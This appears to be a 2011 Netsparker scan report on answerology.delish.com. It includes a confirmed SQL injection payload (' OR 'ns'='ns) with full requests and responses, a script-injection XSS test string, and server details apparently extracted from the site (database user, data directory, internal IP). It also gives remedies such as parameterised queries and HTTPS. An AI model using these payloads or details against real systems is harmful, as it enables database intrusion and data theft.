SQL Injection, CWE-89, CAPEC-66, MySQL 5.0.90-community, answerology.delish.com

MySQL Version = 5.0.90-community, @@datadir = dbdata1/mdmysql2a/, User = ap_ans@mdansweb.ops.hearstdigital.com, Database = answerology

Loading
Netsparker - Scan Report Summary
TARGET URL
 http://answerology.delish.com//index.aspx?tem...
SCAN DATE
 9/17/2011 1:35:31 PM
REPORT DATE
 10/3/2011 8:02:25 PM
SCAN DURATION
 00:05:01

Total Requests

Average Speed

req/sec.
12
identified
5
confirmed
1
critical
4
informational

SCAN SETTINGS

Scan Settings
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
8 %
IMPORTANT
8 %
MEDIUM
17 %
LOW
33 %
INFORMATION
33 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
//index.aspx au GET Boolean Based SQL Injection Yes
question_id GET [Possible] Cross-site Scripting No
ASP.NET Version Disclosure No
MySQL Database Identified Yes
IIS Version Disclosure No
/fckeditor/ Forbidden Resource Yes
/index.aspx nextTemplate GET [Possible] Cross-site Scripting No
template GET [Possible] Internal IP Address Leakage No
template GET E-mail Address Disclosure No
/index.aspx.cs [Possible] Backup File Found No
/index.aspx/answers/ Password Transmitted Over HTTP Yes
Auto Complete Enabled Yes
Boolean Based SQL Injection

Boolean Based SQL Injection
1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed Netsparker to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

The best way to protect your code against SQL Injections is using parameterised queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- //index.aspx

//index.aspx CONFIRMED

http://answerology.delish.com//index.aspx?template=cobrand_question_of_day_widget.ascx&widgetName=de..

Parameters

Parameter Type Value
template GET cobrand_question_of_day_widget.ascx
widgetName GET delish_rightrail
au GET ' OR 'ns'='ns
__as_javascript GET true

Request

GET //index.aspx?template=cobrand_question_of_day_widget.ascx&widgetName=delish_rightrail&au='+OR+'ns'%3d'ns&__as_javascript=true HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Date: Sat, 17 Sep 2011 13:34:49 GMT
Content-Length: 738
Connection: keep-alive
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


document.write("\n");document.write("\n");document.write("<div style=\"height:40px;font-size:14px;line-height:18px;color:#668C1F;padding:0 0 10px 50px;background:url(http://answerology.delish.com//cobrands/delish/widgets/delish_rightrail/assets/qmark.png) no-repeat;\">\n");document.write(" Half Your Age Plus 7\n");document.write("</div>\n");document.write("<div style=\"height:100px;overflow:hidden;padding:0 0 15px;\">\n");document.write(" When it comes to asking a woman out, or thinking about her in terms of a serious relationship, how important is a woman's age to a man?<br /><br />\n");document.write("- Asked By amy16l\n");document.write("</div>\n");document.write("<div style=\"text-align:right;padding:0 10px 6px 0;overflow:hidden;zoom:1;\">\n");document.write(" <a href=\"http://answerology.delish.com//index.aspx?template=answer_question.ascx&question_id=143&type=EditedDialog&query=recent_questions&showEditedDialogs=true&click=ans_uni\" style=\"float:right;height:26px;overflow:hidden;\"><img src=\"http://answerology.delish.com//cobrands/delish/widgets/delish_rightrail/assets/btn-answer.png\" alt=\"Answer\" style=\"border:0\" onmouseover=\"this.style.margin='-26px 0 0'\" onmouseout=\"this.style.margin='0'\" /></a>\n");document.write("</div>\n");document.write("<div style=\"border-top:1px dashed #e4e4e4;text-align:right;padding:6px 10px 0 0\">\n");document.write(" <a href=\"http://answerology.delish.com//index.aspx/best_of/143_Half-Your-Age-Plus-7.html?query=recent_questions&kr=true\" style=\"color:#668C1F;text-decoration:none;font-size:13px;\" onmouseover=\"this.style.color='#253E0B'\" onmouseout=\"this.style.color='#668C1F'\">See how other people responded</a> <span style=\"color:#F1003E\">»</span>\n");document.write("</div>\n");document.write("\n");
Password Transmitted Over HTTP

Password Transmitted Over HTTP
1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.

Classification

OWASP A9 PCI v1.2-6.5.9 PCI v2.0-6.5.4 CWE-311 WASC-04
- /index.aspx/answers/

/index.aspx/answers/ CONFIRMED

http://answerology.delish.com/index.aspx/answers/

Form target action

/index.aspx

Request

GET /index.aspx/answers/ HTTP/1.1
Referer: http://answerology.delish.com/index.aspx/answers/Anniversary-gift.html?popular=true
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Date: Sat, 17 Sep 2011 13:42:12 GMT
Content-Length: 31229
Connection: keep-alive
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html xmlns:fb="http://www.facebook.com/2008/fbml" lang="en"><head> <title>Cooking Tips - Recipe Advice and Help with Cooking</title><meta name="title" content="Cooking Tips - Recipe Advice and Help with Cooking" /><meta name="description" content="At Answerology.com, you can ask the opposite sex anything! Anonymously survey our global community of men and women. Get real answers to your most intimate relationship questions. Ask fun questions, get fun answers. Pose serious questions, get serious answers. Answerology. The modern way to explore life's age-old dilemna -- miscommunication between the sexes." /><meta name="keywords" content="adult personal ads, affairs, advice, ask a question, anonymous,answers, articles, attractive, attractive men, attractive women, breaking up, chat, change of heart, companion, commitment, dating advice, dating tips, divorce, divorced, engagements, expert advice, hooking up, hot guys, hot girls, marriage, miscommunication, online dating, parenting, picking up, question, questions, relationship, relationships, relationship advice, romance, secrets, serious relationship, sex, sexual, sex tips, weddings, what woman want, what women want" /> <!-- 172.20.65.108 9/17/2011 9:42:12 AM --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta NAME="zrobots" CONTENT="all" /> <meta NAME="revisit-after" CONTENT="5 days" /> <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.3.2.min.js"></script> <title>Recipes, Party Food, Cooking Guides, Dinner Ideas, and Grocery Coupons - Delish.com</title><meta name="description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><link rel="apple-touch-icon" href="/cm/delish/site_images/favicon/apple-touch-icon.png" /><link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/x-icon" /><!-- **** Canonical Meta-tag **** --><link rel="canonical" href="http://www.delish.com/answerology-wrapper/"/><!-- **** RSS **** --><link rel="alternate" type="application/rss+xml" href="http://www.delish.com" /><!-- **** STYLES **** --><!-- MSN Video Player CSS File --><!--<link rel="stylesheet" type="text/css" href="/cm/delish/styles/channels.css"></link>--><link rel="stylesheet" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" /><script type"text/javascript"> /* Set document.domain early for proper ad render */ try { document.domain = 'delish.com'; } catch(ex){}</script><style type="text/css"> /* IE Hover htc */ body { behavior: url('http://games.delish.com/proxy.aspx?url=http://www.delish.com/cm/delish/scripts/csshover3.htc'); }</style><link rel="stylesheet" href="/cm/delish/styles/global.css" type="text/css" /><link rel="stylesheet" href="/cm/delish/styles/header.css" type="text/css" /><!-- **** SCRIPTS **** --><!-- Static Promo: restrict access if subdomain not match category --><!-- End Static Promo --><script src="/cm/shared/scripts/jquery-1.4.2.min.js" language="javascript" type="text/javascript"></script><!-- refresh ads --><!-- quiz includes --><!-- /quiz includes --><script src="/cm/delish/scripts/jquery.tooltip.pack.js" type="text/javascript" language="javascript"></script><script language="javascript" src="/cm/shared/scripts/jqXMLUtils.js"></script><script src="/cm/shared/scripts/jquery.bgiframe.min.js" type="text/javascript"></script><!-- games_wrapper --><script language="javascript" src="/cm/delish/scripts/rf-tmpl-ext.js" type="text/javascript"></script><script language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL CONSTANTSvar articleID = "";var rf_cache_bust = Math.floor(Math.random()*100001);var site_name = "Delish";//Article Source Codevar source_id = "";//Set up the source link type - based on content type//var pageAdsParams = {"sub_cat_prefixes":"","article_type_prefix":null,"site_prefix":"delish","position_list":"ams_delish_1x1,ams_delish_footer,ams_delish_networktout,ams_delish_sponsored_links,ams_delish_top","ad_sub_category_prefix":null,"subdomain":"www","ams_promo":null,"url_name":null,"keywords":null,"browser_path":"/answerology-wrapper/?ignoreCache=1","section_prefix":"answerology-wrapper","ad_category_prefix":null,"cat_prefixes":""};</script><script type="text/javascript" src="/cm/shared/scripts/cookies.js"></script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script><link href="/cm/delish/styles/autocomplete.css" rel="stylesheet" type="text/css"><script src="/cm/delish/scripts/autocomplete_bgiframe_delish.js" type="text/javascript"></script><!--<gTMPL_INCLUDE NAME="xs_script_include_user_session.tmpl">--><!-- TEST script includes xs_script_include_user_session.tmpl DIRECT INSERT--><script>var _ghearst_vars = {};//_ghearst_vars["ams_ads_script_src"] = "";</script><script src="/cm/shared/scripts/get_mag_user_local_v02.js" type="text/javascript" ></script><script>if ($h.session.ha){ $h.util.buildScriptTag("&ha=1"); } else { }</script><!-- Omniture global variable --><script language="javascript">var s_prop49 = '';</script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/login.js"></script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/global.js"></script><!-- search and global js go here --><!-- MSN Video Player Scripts --><script src='/cm/delish/scripts/jquery.simplemodal.js' type='text/javascript'></script><!-- Confirm JS and CSS files for Logout--><script src='/cm/delish/scripts/confirm.js' type='text/javascript'></script><link type='text/css' href='/cm/delish/styles/confirm.css' rel='stylesheet' media='screen' /><!--[if lt IE 7]><link type='text/css' href='/cm/delish/styles/basic_ie.css' rel='stylesheet' media='screen' /><![endif]--><script language="javascript" type="text/javascript" src="/cm/shared/ria/swfobject2.1/swfobject.min.js"></script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/flash.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL FUNCTIONS/*@cc_on @*//*@if (@_jscript_version < 5.7)$(document).ready(function(){ $('#global_footer').css('display','none'); $('#global_footer').css('display','block');});/*@end @*/</script><script language="javascript">function refreshAds(){ //Hearst tracking if (top.s) { pageviewTracking(); } //MSN tracking if (top.s_msn) { if ( s_msn.referrer == location.href ) { s_msn.referrer=''; } s_msn.t(); } try { wlAnalytics.TrackPage(); } catch (e) { $.track.trackInfo.userStatic.requestId = null; $.track.trackPage(); } var spans = document.getElementsByTagName('span'); var adDivs = new Array(); for(var i=0;i<spans.length;i++){ if(spans[i].id.indexOf('ams_del') > -1 && spans[i].firstChild){ if(spans[i].firstChild.nodeName == 'DIV'){ adDivs.push(spans[i].firstChild); } } } for(var i=0;i<adDivs.length;i++){ dapMgr.displayAd(dapMgr.getAdItemIndex(adDivs[i].id)); }}</script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/omniture-tags.js"></script><!-- SHARE THIS SCRIPT DONT REMOVE --><script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=d63a4976-501a-446d-81e6-434d03d8388c&amp;type=website&amp;buttonText=&amp;embeds=true&amp;post_services=facebook%2Ctwitter%2Cdelicious%2Cstumbleupon%2Cmyspace%2Cdigg%2Creddit%2Cblogger%2Cwordpress%2Ctypepad%2Cgoogle_bmarks%2Cwindows_live%2Cfark%2Cbus_exchange%2Cpropeller%2Cnewsvine%2Clinkedin%2Ctechnorati%2Cmixx%2Cybuzz%2Cfriendfeed&amp;linkfg=%23668c1f&amp;offsetLeft=-180;onmouseover=false"></script><!-- //END FO SHARE THIS SCRIPT --><!-- Social --><!--xs_social_metatag_includes.tmpl--><meta property="og:description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><!--/xs_social_metatag_includes.tmpl--><!-- /Social --><!-- Handle print function --><script language="javascript" type="text/javascript">$(document).ready(function(){ // Action for Print button Viral Tools $(".printButton a").click(function() { window.open("/print-this/" + this.id + "?page=all","Print","width=1000,height=800,menubar=no,toolbar=no,scrollbars=yes"); });});</script><!-- Handle print function --></head> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/vnd.microsoft.icon" /> <link rel="shortcut icon" href="/cobrands/delish/images/favicon.ico" type="image/x-icon" /> <link rel="stylesheet" href="/cobrands/delish/cobrand_styles.css?v=536265605"> <!--[if lte IE 7]><script src="/cssjs/ie-css3.js"></script><![endif]--> <script type="text/javascript" src="/cssjs/jquery.form.js"></script> <script type="text/javascript" src="/cssjs/jquery.validate.min.js"></script> <script type="text/javascript" src="/fckeditor/fckeditor.js"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/UserReferrerGetter.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Utils.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CharacterCounter.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/LayoutFactory.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/Layout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/CoachesLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/KnightRidderLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cssjs/countdownTimer.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/marieclaire/MarieClaireLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/redbookmag/RedbookmagLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmopolitan/CosmopolitanLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/seventeen/SeventeenLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/goodhousekeeping/GoodhousekeepingLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/cosmogirl/CosmogirlLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/quickandsimple/QuickAndSimpleLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/delish/DelishLayout.js?v=536265605"></script> <script language="JavaScript" type="text/javascript" src="/cobrands/realbeauty/RealBeautyLayout.js?v=536265605"></script> <script type="text/javascript" src="/cssjs/headers.js?v=536265605"></script> <script language="JavaScript"> var args = getArgs(location.search.substring(1)); var factory = new LayoutFactory( false, ["purchase_gc.ascx"], ["registration.ascx"], args["template"] ); var cookiesToSet = []; var referrerGetter = new UserReferrerGetter(readCookie("referrer"), args["setReferrer"], cookiesToSet, document.referrer, document.location.href, ["testing.answerology.com", "answerology.com", "www.answerology.com", "hearst.answerology.com"], "", ""); var layout = factory.getLayout( 'delish' ); for (i=0; i<cookiesToSet.length; i++) { createCookie("referrer",cookiesToSet[i] , 1000, ' .delish.com' ); } </script> <script language="JavaScript"> var Answerology = { isLoggedIn: false, template: 'home.ascx', facebook: { appId: '112965278727107' } } </script> <!-- AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript"> <!-- var rsi_segs = []; var segs_beg=document.cookie.indexOf('rsi_segs='); if (segs_beg>=0){ segs_beg=document.cookie.indexOf('=',segs_beg)+1; if(segs_beg>0){ var segs_end=document.cookie.indexOf(';',segs_beg); if(segs_end==-1) segs_end=document.cookie.length; rsi_segs=document.cookie.substring(segs_beg,segs_end) .split('|'); } } var segLen=20; var segQS=""; if (rsi_segs.length<segLen){segLen=rsi_segs.length} for (var i=0;i<segLen;i++){ segQS+=("rsi"+"="+rsi_segs[i]+";") } //--> </script> <!-- END AUDIENCESCIENCE AD TAG CODE --> <script type="text/javascript" src="/cssjs/channels.js?v=536265605"></script> <script> //coaches_eyebrow bb_cgt="AOL Living Sites"; bb_cg=[{n:'N',t:'Beauty and Style',u:'http://living.aol.com/aolliving/beauty_style',v:'22',e:''}, {n:'N',t:'Coaches',u:'http://coaches.aol.com/',v:'22',e:''}, {n:'N',t:'Diet and Fitness',u:'http://diets.aol.com/',v:'22',e:''}, {n:'N',t:'Food',u:'http://food.aol.com/food/channel',v:'22',e:''}, {n:'N',t:'Health',u:'http://health.aol.com/',v:'22',e:''}, {n:'N',t:'Home',u:'http://homechannel.aol.com/',v:'22',e:''}, {n:'N',t:'Horoscopes',u:'http://horoscopes.aol.com/',v:'22',e:''}, {n:'N',t:'Parenting',u:'http://parenting.aol.com/parenting/onlyonaol',v:'22',e:''}]; </script> <script> document.write( layout.getCSS() ); </script> <script> document.write( layout.getStyle() ); </script> <!-- script type="text/javascript"> if (document.location != top.location) { top.location = document.location; } </script --> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --> <script type="text/javascript"> <!-- function FCx(x){ var min=15; // minimum minutes between interstitials (needs to be >15) if(x.indexOf('get.media')>0){ x=unescape(x.substring(x.indexOf('&url=')+5,x.length)); }else{ if(document.cookie.indexOf('CxIC=1')<=0){ x='http://media.fastclick.net/w/get.media?sid=16779&m=5&tp=6&url='+escape(x); var date_ob=new Date(); date_ob.setTime(date_ob.getTime()+min*1000*60); document.cookie='FCxIC=1; path=/; expires='+date_ob.toGMTString(); } } return x } // --> </script> <!-- FASTCLICK.COM INTERSTITIAL HEAD CODE v1.0 for answerology.com --></head><body><div id="fb-root"></div><div id="wrapper"><script> layout.getHeaderBoxAd('homepage');</script><script> layout.getHeaderBox(referrerGetter.execute());</script>

<div id="container"> <!-- BEGIN MSN UX STYLE & SCRIPT INCLUDES --> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/core.js"></script> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/2/report.js"></script> <link rel="stylesheet" href="/cm/delish/styles/msn_header.css" type="text/css" /> <!--[if IE]> <link rel="stylesheet" href="/cm/delish/styles/msn_header_ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script> <!-- END MSN UX STYLE & SCRIPT INCLUDES --><div id="msn_header"> <div id=&..
[Possible] Cross-site Scripting

[Possible] Cross-site Scripting
2 TOTAL
MEDIUM
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

Netsparker believes that there is a XSS (Cross-site Scripting) in here it could not confirm it. We strongly recommend investigating the issue manually to ensure that it is an XSS (Cross-site Scripting) and needs to be addressed.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hi-jacking users' active session
  • Changing the look of the page within the victims browser.
  • Mounting a successful phishing attack.
  • Intercept data and perform man-in-the-middle attacks.

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

Classification

OWASP A2 PCI v1.2-6.5.1 PCI v2.0-6.5.7 CWE-79 CAPEC-19 WASC-08
- //index.aspx

//index.aspx

http://answerology.delish.com//index.aspx?template=answer_question.ascx&question_id=2644%00%27%22--%..

Parameters

Parameter Type Value
template GET answer_question.ascx
question_id GET 2644'"--></style></script><script>alert(0x0001C7)</script>
type GET EditedDialog
query GET recent_questions
showEditedDialogs GET true
click GET ans_uni\

Request

GET //index.aspx?template=answer_question.ascx&question_id=2644%00%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker(0x0001C7)%3C%2Fscript%3E&type=EditedDialog&query=recent_questions&showEditedDialogs=true&click=ans_uni%5C HTTP/1.1
Referer: http://answerology.delish.com//index.aspx?template=cobrand_question_of_day_widget.ascx&widgetName=delish_rightrail&au=delishmodules&__as_javascript=true
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: answerology.delish.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: policyref="/w3w/p3p.xml": CP="ALL DSP COR CURa ADMa DEVo CONi OUR DELa BUS IND PHY ONL UNI PUR COM NAV STA"
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Date: Sat, 17 Sep 2011 13:41:40 GMT
Content-Length: 19190
Connection: keep-alive
Cache-Control: no-cache
Expires: -1
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html xmlns:fb="http://www.facebook.com/2008/fbml" lang="en"><head> <title>Cooking Tips - Recipe Advice and Help with Cooking</title><meta name="title" content="Cooking Tips - Recipe Advice and Help with Cooking" /><meta name="description" content="At Answerology.com, you can ask the opposite sex anything! Anonymously survey our global community of men and women. Get real answers to your most intimate relationship questions. Ask fun questions, get fun answers. Pose serious questions, get serious answers. Answerology. The modern way to explore life's age-old dilemna -- miscommunication between the sexes." /><meta name="keywords" content="adult personal ads, affairs, advice, ask a question, anonymous,answers, articles, attractive, attractive men, attractive women, breaking up, chat, change of heart, companion, commitment, dating advice, dating tips, divorce, divorced, engagements, expert advice, hooking up, hot guys, hot girls, marriage, miscommunication, online dating, parenting, picking up, question, questions, relationship, relationships, relationship advice, romance, secrets, serious relationship, sex, sexual, sex tips, weddings, what woman want, what women want" /> <!-- 172.20.65.108 9/17/2011 9:41:40 AM --> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta NAME="zrobots" CONTENT="all" /> <meta NAME="revisit-after" CONTENT="5 days" /> <script language="JavaScript" type="text/javascript" src="/cssjs/jquery-1.3.2.min.js"></script> <title>Recipes, Party Food, Cooking Guides, Dinner Ideas, and Grocery Coupons - Delish.com</title><meta name="description" content="For home cooks hungry for easy family meals: Find thousands of tested recipes, menus, cooking shortcuts, dinner ideas, chef tips, and more at Delish.
" /><link rel="apple-touch-icon" href="/cm/delish/site_images/favicon/apple-touch-icon.png" /><link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/vnd.microsoft.icon" />
<link rel="shortcut icon" href="/cm/delish/site_images/favicon/favicon.ico" type="image/x-icon" /><!-- **** Canonical Meta-tag **** --><link rel="canonical" href="http://www.delish.com/answerology-wrapper/"/><!-- **** RSS **** --><link rel="alternate" type="application/rss+xml" href="http://www.delish.com" /><!-- **** STYLES **** --><!-- MSN Video Player CSS File --><!--<link rel="stylesheet" type="text/css" href="/cm/delish/styles/channels.css"></link>--><link rel="stylesheet" href="http://img.widgets.video.s-msn.com/js/ch/channels.css" /><script type"text/javascript"> /* Set document.domain early for proper ad render */ try { document.domain = 'delish.com'; } catch(ex){}</script><style type="text/css"> /* IE Hover htc */ body { behavior: url('http://games.delish.com/proxy.aspx?url=http://www.delish.com/cm/delish/scripts/csshover3.htc'); }</style><link rel="stylesheet" href="/cm/delish/styles/global.css" type="text/css" /><link rel="stylesheet" href="/cm/delish/styles/header.css" type="text/css" /><!-- **** SCRIPTS **** --><!-- Static Promo: restrict access if subdomain not match category --><!-- End Static Promo --><script src="/cm/shared/scripts/jquery-1.4.2.min.js" language="javascript" type="text/javascript"></script><!-- refresh ads --><!-- quiz includes --><!-- /quiz includes --><script src="/cm/delish/scripts/jquery.tooltip.pack.js" type="text/javascript" language="javascript"></script><script language="javascript" src="/cm/shared/scripts/jqXMLUtils.js"></script><script src="/cm/shared/scripts/jquery.bgiframe.min.js" type="text/javascript"></script><!-- games_wrapper --><script language="javascript" src="/cm/delish/scripts/rf-tmpl-ext.js" type="text/javascript"></script><script language="javascript" src="http://img.widgets.video.s-msn.com/js/embed.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL CONSTANTSvar articleID = "";var rf_cache_bust = Math.floor(Math.random()*100001);var site_name = "Delish";//Article Source Codevar source_id = "";//Set up the source link type - based on content type//var pageAdsParams = {"sub_cat_prefixes":"","article_type_prefix":null,"site_prefix":"delish","position_list":"ams_delish_1x1,ams_delish_footer,ams_delish_networktout,ams_delish_sponsored_links,ams_delish_top","ad_sub_category_prefix":null,"subdomain":"www","ams_promo":null,"url_name":null,"keywords":null,"browser_path":"/answerology-wrapper/?ignoreCache=1","section_prefix":"answerology-wrapper","ad_category_prefix":null,"cat_prefixes":""};</script><script type="text/javascript" src="/cm/shared/scripts/cookies.js"></script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script><link href="/cm/delish/styles/autocomplete.css" rel="stylesheet" type="text/css"><script src="/cm/delish/scripts/autocomplete_bgiframe_delish.js" type="text/javascript"></script><!--<gTMPL_INCLUDE NAME="xs_script_include_user_session.tmpl">--><!-- TEST script includes xs_script_include_user_session.tmpl DIRECT INSERT--><script>var _ghearst_vars = {};//_ghearst_vars["ams_ads_script_src"] = "";</script><script src="/cm/shared/scripts/get_mag_user_local_v02.js" type="text/javascript" ></script><script>if ($h.session.ha){ $h.util.buildScriptTag("&ha=1"); } else { }</script><!-- Omniture global variable --><script language="javascript">var s_prop49 = '';</script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/login.js"></script><script type="text/javascript" language="javascript" src="/cm/delish/scripts/global.js"></script><!-- search and global js go here --><!-- MSN Video Player Scripts --><script src='/cm/delish/scripts/jquery.simplemodal.js' type='text/javascript'></script><!-- Confirm JS and CSS files for Logout--><script src='/cm/delish/scripts/confirm.js' type='text/javascript'></script><link type='text/css' href='/cm/delish/styles/confirm.css' rel='stylesheet' media='screen' /><!--[if lt IE 7]><link type='text/css' href='/cm/delish/styles/basic_ie.css' rel='stylesheet' media='screen' /><![endif]--><script language="javascript" type="text/javascript" src="/cm/shared/ria/swfobject2.1/swfobject.min.js"></script><script language="javascript" type="text/javascript" src="/cm/delish/scripts/flash.js"></script><script language="javascript" type="text/javascript">//INITIALIZE GLOBAL FUNCTIONS/*@cc_on @*//*@if (@_jscript_version < 5.7)$(document).ready(function(){ $('#global_footer').css('display','none'); $('#global_footer').css('display','block');});/*@end @*/</script><script language="javascript">function refreshAds(){ //Hearst tracking if (top.s) { pageviewTracking(); } //MSN tracking if (top.s_msn) { if ( s_msn.referrer == location.href ) { 